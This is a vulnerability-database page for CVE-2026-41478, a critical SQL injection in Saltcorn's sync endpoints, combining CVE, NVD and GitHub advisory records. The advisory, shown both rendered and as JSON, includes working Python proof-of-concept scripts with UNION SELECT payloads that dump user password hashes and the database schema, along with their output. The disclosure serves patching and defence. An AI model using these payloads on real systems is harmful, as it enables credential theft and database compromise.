Vulnerability-Lookup

CVE-2026-41478 (GCVE-0-2026-41478)

Vulnerability from cvelistv5 – Published: 2026-04-24 20:52 – Updated: 2026-04-27 13:34

Title

Saltcorn: SQL Injection via Unparameterized Sync Endpoints (maxLoadedId)

Summary

Saltcorn is an extensible, open source, no-code database application builder. Prior to 1.4.6, 1.5.6, and 1.6.0-beta.5, a SQL injection vulnerability in Saltcorn’s mobile-sync routes allows any authenticated low-privilege user with read access to at least one table to inject arbitrary SQL through sync parameters. This can lead to full database exfiltration, including admin password hashes and configuration secrets, and may also enable database modification or destruction depending on the backend. This vulnerability is fixed in 1.4.6, 1.5.6, and 1.6.0-beta.5.

Severity ?

10 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Assigner

GitHub_M

References

URL

Tags

https://github.com/saltcorn/saltcorn/security/adv…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	saltcorn	saltcorn	Affected: < 1.4.6 Affected: >= 1.5.0-beta.0, < 1.5.6 Affected: >= 1.6.0-alpha.0, < 1.6.0-beta.5

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-41478",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-27T13:10:53.061661Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-27T13:34:34.775Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/saltcorn/saltcorn/security/advisories/GHSA-jp74-mfrx-3qvh"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "saltcorn",
          "vendor": "saltcorn",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.4.6"
            },
            {
              "status": "affected",
              "version": "\u003e= 1.5.0-beta.0, \u003c 1.5.6"
            },
            {
              "status": "affected",
              "version": "\u003e= 1.6.0-alpha.0, \u003c 1.6.0-beta.5"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Saltcorn is an extensible, open source, no-code database application builder. Prior to 1.4.6, 1.5.6, and 1.6.0-beta.5, a SQL injection vulnerability in Saltcorn\u2019s mobile-sync routes allows any authenticated low-privilege user with read access to at least one table to inject arbitrary SQL through sync parameters. This can lead to full database exfiltration, including admin password hashes and configuration secrets, and may also enable database modification or destruction depending on the backend. This vulnerability is fixed in 1.4.6, 1.5.6, and 1.6.0-beta.5."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 10,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-89",
              "description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-24T20:52:30.670Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/saltcorn/saltcorn/security/advisories/GHSA-jp74-mfrx-3qvh",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/saltcorn/saltcorn/security/advisories/GHSA-jp74-mfrx-3qvh"
        }
      ],
      "source": {
        "advisory": "GHSA-jp74-mfrx-3qvh",
        "discovery": "UNKNOWN"
      },
      "title": "Saltcorn: SQL Injection via Unparameterized Sync Endpoints (maxLoadedId)"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-41478",
    "datePublished": "2026-04-24T20:52:30.670Z",
    "dateReserved": "2026-04-20T16:14:19.005Z",
    "dateUpdated": "2026-04-27T13:34:34.775Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-41478",
      "date": "2026-04-27",
      "epss": "0.0003",
      "percentile": "0.08649"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-41478\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-24T21:16:19.353\",\"lastModified\":\"2026-04-27T18:57:20.293\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Saltcorn is an extensible, open source, no-code database application builder. Prior to 1.4.6, 1.5.6, and 1.6.0-beta.5, a SQL injection vulnerability in Saltcorn\u2019s mobile-sync routes allows any authenticated low-privilege user with read access to at least one table to inject arbitrary SQL through sync parameters. This can lead to full database exfiltration, including admin password hashes and configuration secrets, and may also enable database modification or destruction depending on the backend. This vulnerability is fixed in 1.4.6, 1.5.6, and 1.6.0-beta.5.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":9.9,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.1,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"references\":[{\"url\":\"https://github.com/saltcorn/saltcorn/security/advisories/GHSA-jp74-mfrx-3qvh\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/saltcorn/saltcorn/security/advisories/GHSA-jp74-mfrx-3qvh\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-41478\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-27T13:10:53.061661Z\"}}}], \"references\": [{\"url\": \"https://github.com/saltcorn/saltcorn/security/advisories/GHSA-jp74-mfrx-3qvh\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-27T13:10:54.104Z\"}}], \"cna\": {\"title\": \"Saltcorn: SQL Injection via Unparameterized Sync Endpoints (maxLoadedId)\", \"source\": {\"advisory\": \"GHSA-jp74-mfrx-3qvh\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 10, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"saltcorn\", \"product\": \"saltcorn\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.4.6\"}, {\"status\": \"affected\", \"version\": \"\u003e= 1.5.0-beta.0, \u003c 1.5.6\"}, {\"status\": \"affected\", \"version\": \"\u003e= 1.6.0-alpha.0, \u003c 1.6.0-beta.5\"}]}], \"references\": [{\"url\": \"https://github.com/saltcorn/saltcorn/security/advisories/GHSA-jp74-mfrx-3qvh\", \"name\": \"https://github.com/saltcorn/saltcorn/security/advisories/GHSA-jp74-mfrx-3qvh\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Saltcorn is an extensible, open source, no-code database application builder. Prior to 1.4.6, 1.5.6, and 1.6.0-beta.5, a SQL injection vulnerability in Saltcorn\\u2019s mobile-sync routes allows any authenticated low-privilege user with read access to at least one table to inject arbitrary SQL through sync parameters. This can lead to full database exfiltration, including admin password hashes and configuration secrets, and may also enable database modification or destruction depending on the backend. This vulnerability is fixed in 1.4.6, 1.5.6, and 1.6.0-beta.5.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-89\", \"description\": \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-24T20:52:30.670Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-41478\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-27T13:34:34.775Z\", \"dateReserved\": \"2026-04-20T16:14:19.005Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-24T20:52:30.670Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-41478

Vulnerability from fkie_nvd - Published: 2026-04-24 21:16 - Updated: 2026-04-27 14:16

Severity ?

9.9 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/saltcorn/saltcorn/security/advisories/GHSA-jp74-mfrx-3qvh
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/saltcorn/saltcorn/security/advisories/GHSA-jp74-mfrx-3qvh

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Saltcorn is an extensible, open source, no-code database application builder. Prior to 1.4.6, 1.5.6, and 1.6.0-beta.5, a SQL injection vulnerability in Saltcorn\u2019s mobile-sync routes allows any authenticated low-privilege user with read access to at least one table to inject arbitrary SQL through sync parameters. This can lead to full database exfiltration, including admin password hashes and configuration secrets, and may also enable database modification or destruction depending on the backend. This vulnerability is fixed in 1.4.6, 1.5.6, and 1.6.0-beta.5."
    }
  ],
  "id": "CVE-2026-41478",
  "lastModified": "2026-04-27T14:16:49.673",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.9,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.1,
        "impactScore": 6.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-24T21:16:19.353",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/saltcorn/saltcorn/security/advisories/GHSA-jp74-mfrx-3qvh"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/saltcorn/saltcorn/security/advisories/GHSA-jp74-mfrx-3qvh"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-JP74-MFRX-3QVH

Vulnerability from github – Published: 2026-04-16 22:51 – Updated: 2026-04-16 22:51

Summary

Saltcorn: SQL Injection via Unparameterized Sync Endpoints (maxLoadedId)

Details

Summary

Saltcorn's mobile-sync routes (POST /sync/load_changes and POST /sync/deletes) interpolate user-controlled values directly into SQL template literals without parameterization, type-casting, or sanitization. Any authenticated user (role_id ≥ 80, the default "user" role) who has read access to at least one table can inject arbitrary SQL, exfiltrate the entire database including admin password hashes, enumerate all table schemas, and—on a PostgreSQL-backed instance—execute write or DDL operations.

Details

Vulnerable code paths

Primary: packages/server/routes/sync.js — getSyncRows() function

// Line 68 — maxLoadedId branch (no syncFrom)
where data_tbl."${db.sqlsanitize(pkName)}" > ${syncInfo.maxLoadedId}

// Line 100 — maxLoadedId branch (with syncFrom)
and info_tbl.ref > ${syncInfo.maxLoadedId}

syncInfo is taken verbatim from req.body.syncInfos[tableName]. There is no parseInt(), isFinite(), or parameterized binding applied to maxLoadedId before it is embedded into the SQL string passed to db.query().

db.sqlsanitize() is used elsewhere in the same query to quote identifiers (table and column names) — a correct use — but is never applied to values, and would not prevent injection anyway because it only escapes double-quote characters.

Variant H1-V2: packages/server/routes/sync.js — getDelRows() function (lines 173–190)

// Lines 182-183 — syncUntil and syncFrom come from req.body.syncTimestamp / syncFrom where alias.max < to_timestamp(${syncUntil.valueOf() / 1000.0})   and alias.max > to_timestamp(${syncFrom.valueOf() / 1000.0})

syncUntil = new Date(syncTimestamp) where syncTimestamp comes from req.body. The resulting .valueOf() / 1000.0 is still interpolated as a raw numeric expression.

Route handler: lines 113–170 (/load_changes)

router.post(
  "/load_changes",
  loggedIn,           // <-- only authentication check; no input validation
  error_catcher(async (req, res) => {
    const { syncInfos, loadUntil } = req.body || {};
    ...
    // syncInfos[tblName].maxLoadedId is passed directly into getSyncRows

PoC

Please find the attached script to dump the user's DB using a normal user account.

Dumping users table

#!/usr/bin/env python3
import requests
import json
import re

BASE = "http://localhost:3000"
EMAIL = "ccx@ccx.com"
PASSWORD = "Abcd1234!"

s = requests.Session()

print("[*] Fetching login page...")
r = s.get(f"{BASE}/auth/login")
match = re.search(r'_sc_globalCsrf = "([^"]+)"', r.text)
csrf_login = match.group(1)

print("[*] Logging in...")
r = s.post(f"{BASE}/auth/login", json={"email": EMAIL, "password": PASSWORD, "_csrf": csrf_login})

print("[*] Extracting authenticated CSRF token...")
r = s.get(f"{BASE}/")
match = re.search(r'_sc_globalCsrf = "([^"]+)"', r.text)
csrf = match.group(1)

print("[*] Dumping users...")
payload = "999 UNION SELECT 1,email,password,CAST(role_id AS TEXT),CAST(id AS TEXT) FROM users--"
body = {"syncInfos": {"notes": {"maxLoadedId": payload}}, "loadUntil": "2030-01-01"}
headers = {"CSRF-Token": csrf, "Content-Type": "application/json"}

r = s.post(f"{BASE}/sync/load_changes", json=body, headers=headers)

if r.status_code == 200:
    print(json.dumps(r.json(), indent=2))
else:
    print(f"Failed: {r.status_code}")

Output:

(dllm) dllm@dllm:~/Downloads/saltcorn/artifacts/scripts$ python poc_h1_sqli_minimal.py
[*] Fetching login page...
[*] Logging in...
[*] Extracting authenticated CSRF token...
[*] Dumping users...
{
  "notes": {
    "rows": [
      {
        "_sync_info_tbl_ref_": "1",
        "_sync_info_tbl_last_modified_": "admin@admin.com",
        "_sync_info_tbl_deleted_": "$2a$10$BiEwZkMIpaBrj5yySQhbVuObOp5bpPpfxZYZDtV.VCTv.UxfI7o.6",
        "id": "1",
        "owner_id": "1"
      },
      {
        "_sync_info_tbl_ref_": "80",
        "_sync_info_tbl_last_modified_": "ccx@ccx.com",
        "_sync_info_tbl_deleted_": "$2a$10$B0WWDy27n1H5D6M0.drOfOlCfp39jcsmk2Ueopx6R3SUwDV/ii0Hm",
        "id": "80",
        "owner_id": "2"
      }
    ],
    "maxLoadedId": "80"
  }
}

Dumping schema

Use the following script below to dump the schema:

#!/usr/bin/env python3
import requests
import json
import re

BASE = "http://localhost:3000"
EMAIL = "ccx@ccx.com"
PASSWORD = "Abcd1234!"

s = requests.Session()

print("[*] Fetching login page...")
r = s.get(f"{BASE}/auth/login")
match = re.search(r'_sc_globalCsrf = "([^"]+)"', r.text)
csrf_login = match.group(1)

print("[*] Logging in...")
r = s.post(f"{BASE}/auth/login", json={"email": EMAIL, "password": PASSWORD, "_csrf": csrf_login})

print("[*] Extracting authenticated CSRF token...")
r = s.get(f"{BASE}/")
match = re.search(r'_sc_globalCsrf = "([^"]+)"', r.text)
csrf = match.group(1)

print("[*] Enumerating database schema...")
payload = "999 UNION SELECT 1,name,type,CAST(sql AS TEXT),NULL FROM sqlite_master WHERE type='table'--"
body = {"syncInfos": {"notes": {"maxLoadedId": payload}}, "loadUntil": "2030-01-01"}
headers = {"CSRF-Token": csrf, "Content-Type": "application/json"}

r = s.post(f"{BASE}/sync/load_changes", json=body, headers=headers)

if r.status_code == 200:
    print(json.dumps(r.json(), indent=2))
else:
    print(f"HTTP {r.status_code}: {r.text[:500]}")

Output:

(dllm) dllm@dllm:~/Downloads/saltcorn/artifacts/scripts$ python poc_h1_schema_enum.py 
[*] Fetching login page...
[*] Logging in...
[*] Extracting authenticated CSRF token...
[*] Enumerating database schema...
{
  "notes": {
    "rows": [
      {
        "_sync_info_tbl_ref_": "CREATE TABLE \"notes\" (id integer primary key, owner_id INTEGER)",
        "_sync_info_tbl_last_modified_": "notes",
        "_sync_info_tbl_deleted_": "table",
        "id": "CREATE TABLE \"notes\" (id integer primary key, owner_id INTEGER)",
        "owner_id": null
      },
<SNIP>
    "maxLoadedId": "CREATE TABLE users (\n      id integer primary key,      \n      email VARCHAR(128) not null unique,\n      password VARCHAR(60),\n      role_id integer not null references _sc_roles(id)\n    , reset_password_token text, reset_password_expiry timestamp, \"language\" text, \"disabled\" boolean not null default false, \"api_token\" text, \"_attributes\" json, \"verification_token\" text, \"verified_on\" timestamp, last_mobile_login timestamp)"
  }
}

Impact

Confidentiality: CRITICAL — Attacker reads the entire database: all user credentials (bcrypt hashes), configuration secrets including _sc_config, all user-created data, and the full schema.
Integrity: CRITICAL — On PostgreSQL the same endpoint can execute INSERT/UPDATE/DELETE/DROP. On SQLite, multiple-statement injection may be possible depending on driver configuration.
Availability: CRITICAL — Attacker can DROP tables or corrupt the database.
Scope: Changed — Any authenticated user (role_id=80) can access admin-tier data and beyond.
Privilege escalation — Admin password hashes are exfiltrated; offline cracking of weak passwords grants admin access.

Severity ?

9.9 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@saltcorn/server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@saltcorn/server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.5.0-beta.0"
            },
            {
              "fixed": "1.5.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@saltcorn/server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.6.0-alpha.0"
            },
            {
              "fixed": "1.6.0-beta.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-16T22:51:43Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "## Summary\nSaltcorn\u0027s mobile-sync routes (`POST /sync/load_changes` and `POST /sync/deletes`) interpolate user-controlled values directly into SQL template literals without parameterization, type-casting, or sanitization. Any authenticated user (role_id \u2265 80, the default \"user\" role) who has read access to at least one table can inject arbitrary SQL, exfiltrate the entire database including admin password hashes, enumerate all table schemas, and\u2014on a PostgreSQL-backed instance\u2014execute write or DDL operations.\n\n## Details\n### Vulnerable code paths\n\n**Primary: `packages/server/routes/sync.js` \u2014 `getSyncRows()` function**\n\n```js\n// Line 68 \u2014 maxLoadedId branch (no syncFrom)\nwhere data_tbl.\"${db.sqlsanitize(pkName)}\" \u003e ${syncInfo.maxLoadedId}\n\n// Line 100 \u2014 maxLoadedId branch (with syncFrom)\nand info_tbl.ref \u003e ${syncInfo.maxLoadedId}\n```\n\n`syncInfo` is taken verbatim from `req.body.syncInfos[tableName]`. There is no `parseInt()`, `isFinite()`, or parameterized binding applied to `maxLoadedId` before it is embedded into the SQL string passed to `db.query()`.\n\n`db.sqlsanitize()` is used elsewhere in the same query to quote *identifiers* (table and column names) \u2014 a correct use \u2014 but is never applied to *values*, and would not prevent injection anyway because it only escapes double-quote characters.\n\n**Variant H1-V2: `packages/server/routes/sync.js` \u2014 `getDelRows()` function (lines 173\u2013190)**\n\n```js\n// Lines 182-183 \u2014 syncUntil and syncFrom come from req.body.syncTimestamp / syncFrom where alias.max \u003c to_timestamp(${syncUntil.valueOf() / 1000.0})   and alias.max \u003e to_timestamp(${syncFrom.valueOf() / 1000.0})\n```\n\n`syncUntil = new Date(syncTimestamp)` where `syncTimestamp` comes from `req.body`. The resulting `.valueOf() / 1000.0` is still interpolated as a raw numeric expression.\n\n**Route handler: lines 113\u2013170 (`/load_changes`)**\n\n```js\nrouter.post(\n  \"/load_changes\",\n  loggedIn,           // \u003c-- only authentication check; no input validation\n  error_catcher(async (req, res) =\u003e {\n    const { syncInfos, loadUntil } = req.body || {};\n    ...\n    // syncInfos[tblName].maxLoadedId is passed directly into getSyncRows\n```\n\n## PoC\nPlease find the attached script to dump the user\u0027s DB using a normal user account.\n\n### Dumping users table\n```python\n#!/usr/bin/env python3\nimport requests\nimport json\nimport re\n\nBASE = \"http://localhost:3000\"\nEMAIL = \"ccx@ccx.com\"\nPASSWORD = \"Abcd1234!\"\n\ns = requests.Session()\n\nprint(\"[*] Fetching login page...\")\nr = s.get(f\"{BASE}/auth/login\")\nmatch = re.search(r\u0027_sc_globalCsrf = \"([^\"]+)\"\u0027, r.text)\ncsrf_login = match.group(1)\n\nprint(\"[*] Logging in...\")\nr = s.post(f\"{BASE}/auth/login\", json={\"email\": EMAIL, \"password\": PASSWORD, \"_csrf\": csrf_login})\n\nprint(\"[*] Extracting authenticated CSRF token...\")\nr = s.get(f\"{BASE}/\")\nmatch = re.search(r\u0027_sc_globalCsrf = \"([^\"]+)\"\u0027, r.text)\ncsrf = match.group(1)\n\nprint(\"[*] Dumping users...\")\npayload = \"999 UNION SELECT 1,email,password,CAST(role_id AS TEXT),CAST(id AS TEXT) FROM users--\"\nbody = {\"syncInfos\": {\"notes\": {\"maxLoadedId\": payload}}, \"loadUntil\": \"2030-01-01\"}\nheaders = {\"CSRF-Token\": csrf, \"Content-Type\": \"application/json\"}\n\nr = s.post(f\"{BASE}/sync/load_changes\", json=body, headers=headers)\n\nif r.status_code == 200:\n    print(json.dumps(r.json(), indent=2))\nelse:\n    print(f\"Failed: {r.status_code}\")\n```\n\nOutput:\n\n```bash\n(dllm) dllm@dllm:~/Downloads/saltcorn/artifacts/scripts$ python poc_h1_sqli_minimal.py\n[*] Fetching login page...\n[*] Logging in...\n[*] Extracting authenticated CSRF token...\n[*] Dumping users...\n{\n  \"notes\": {\n    \"rows\": [\n      {\n        \"_sync_info_tbl_ref_\": \"1\",\n        \"_sync_info_tbl_last_modified_\": \"admin@admin.com\",\n        \"_sync_info_tbl_deleted_\": \"$2a$10$BiEwZkMIpaBrj5yySQhbVuObOp5bpPpfxZYZDtV.VCTv.UxfI7o.6\",\n        \"id\": \"1\",\n        \"owner_id\": \"1\"\n      },\n      {\n        \"_sync_info_tbl_ref_\": \"80\",\n        \"_sync_info_tbl_last_modified_\": \"ccx@ccx.com\",\n        \"_sync_info_tbl_deleted_\": \"$2a$10$B0WWDy27n1H5D6M0.drOfOlCfp39jcsmk2Ueopx6R3SUwDV/ii0Hm\",\n        \"id\": \"80\",\n        \"owner_id\": \"2\"\n      }\n    ],\n    \"maxLoadedId\": \"80\"\n  }\n}\n```\n\n### Dumping schema\nUse the following script below to dump the schema: \n\n```python\n#!/usr/bin/env python3\nimport requests\nimport json\nimport re\n\nBASE = \"http://localhost:3000\"\nEMAIL = \"ccx@ccx.com\"\nPASSWORD = \"Abcd1234!\"\n\ns = requests.Session()\n\nprint(\"[*] Fetching login page...\")\nr = s.get(f\"{BASE}/auth/login\")\nmatch = re.search(r\u0027_sc_globalCsrf = \"([^\"]+)\"\u0027, r.text)\ncsrf_login = match.group(1)\n\nprint(\"[*] Logging in...\")\nr = s.post(f\"{BASE}/auth/login\", json={\"email\": EMAIL, \"password\": PASSWORD, \"_csrf\": csrf_login})\n\nprint(\"[*] Extracting authenticated CSRF token...\")\nr = s.get(f\"{BASE}/\")\nmatch = re.search(r\u0027_sc_globalCsrf = \"([^\"]+)\"\u0027, r.text)\ncsrf = match.group(1)\n\nprint(\"[*] Enumerating database schema...\")\npayload = \"999 UNION SELECT 1,name,type,CAST(sql AS TEXT),NULL FROM sqlite_master WHERE type=\u0027table\u0027--\"\nbody = {\"syncInfos\": {\"notes\": {\"maxLoadedId\": payload}}, \"loadUntil\": \"2030-01-01\"}\nheaders = {\"CSRF-Token\": csrf, \"Content-Type\": \"application/json\"}\n\nr = s.post(f\"{BASE}/sync/load_changes\", json=body, headers=headers)\n\nif r.status_code == 200:\n    print(json.dumps(r.json(), indent=2))\nelse:\n    print(f\"HTTP {r.status_code}: {r.text[:500]}\")\n```\n\nOutput:\n\n```bash\n(dllm) dllm@dllm:~/Downloads/saltcorn/artifacts/scripts$ python poc_h1_schema_enum.py \n[*] Fetching login page...\n[*] Logging in...\n[*] Extracting authenticated CSRF token...\n[*] Enumerating database schema...\n{\n  \"notes\": {\n    \"rows\": [\n      {\n        \"_sync_info_tbl_ref_\": \"CREATE TABLE \\\"notes\\\" (id integer primary key, owner_id INTEGER)\",\n        \"_sync_info_tbl_last_modified_\": \"notes\",\n        \"_sync_info_tbl_deleted_\": \"table\",\n        \"id\": \"CREATE TABLE \\\"notes\\\" (id integer primary key, owner_id INTEGER)\",\n        \"owner_id\": null\n      },\n\u003cSNIP\u003e\n    \"maxLoadedId\": \"CREATE TABLE users (\\n      id integer primary key,      \\n      email VARCHAR(128) not null unique,\\n      password VARCHAR(60),\\n      role_id integer not null references _sc_roles(id)\\n    , reset_password_token text, reset_password_expiry timestamp, \\\"language\\\" text, \\\"disabled\\\" boolean not null default false, \\\"api_token\\\" text, \\\"_attributes\\\" json, \\\"verification_token\\\" text, \\\"verified_on\\\" timestamp, last_mobile_login timestamp)\"\n  }\n}\n```\n\n## Impact\n- **Confidentiality: CRITICAL** \u2014 Attacker reads the entire database: all user credentials (bcrypt hashes), configuration secrets including `_sc_config`, all user-created data, and the full schema.\n- **Integrity: CRITICAL** \u2014 On PostgreSQL the same endpoint can execute INSERT/UPDATE/DELETE/DROP. On SQLite, multiple-statement injection may be possible depending on driver configuration.\n- **Availability: CRITICAL** \u2014 Attacker can DROP tables or corrupt the database.\n- **Scope: Changed** \u2014 Any authenticated user (role_id=80) can access admin-tier data and beyond.\n- **Privilege escalation** \u2014 Admin password hashes are exfiltrated; offline cracking of weak passwords grants admin access.",
  "id": "GHSA-jp74-mfrx-3qvh",
  "modified": "2026-04-16T22:51:43Z",
  "published": "2026-04-16T22:51:43Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/saltcorn/saltcorn/security/advisories/GHSA-jp74-mfrx-3qvh"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/saltcorn/saltcorn"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Saltcorn: SQL Injection via Unparameterized Sync Endpoints (maxLoadedId)"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-41478 (GCVE-0-2026-41478)

FKIE_CVE-2026-41478

GHSA-JP74-MFRX-3QVH

Summary

Details

Vulnerable code paths

PoC

Dumping users table

Dumping schema

Impact

Tags

Sightings

Nomenclature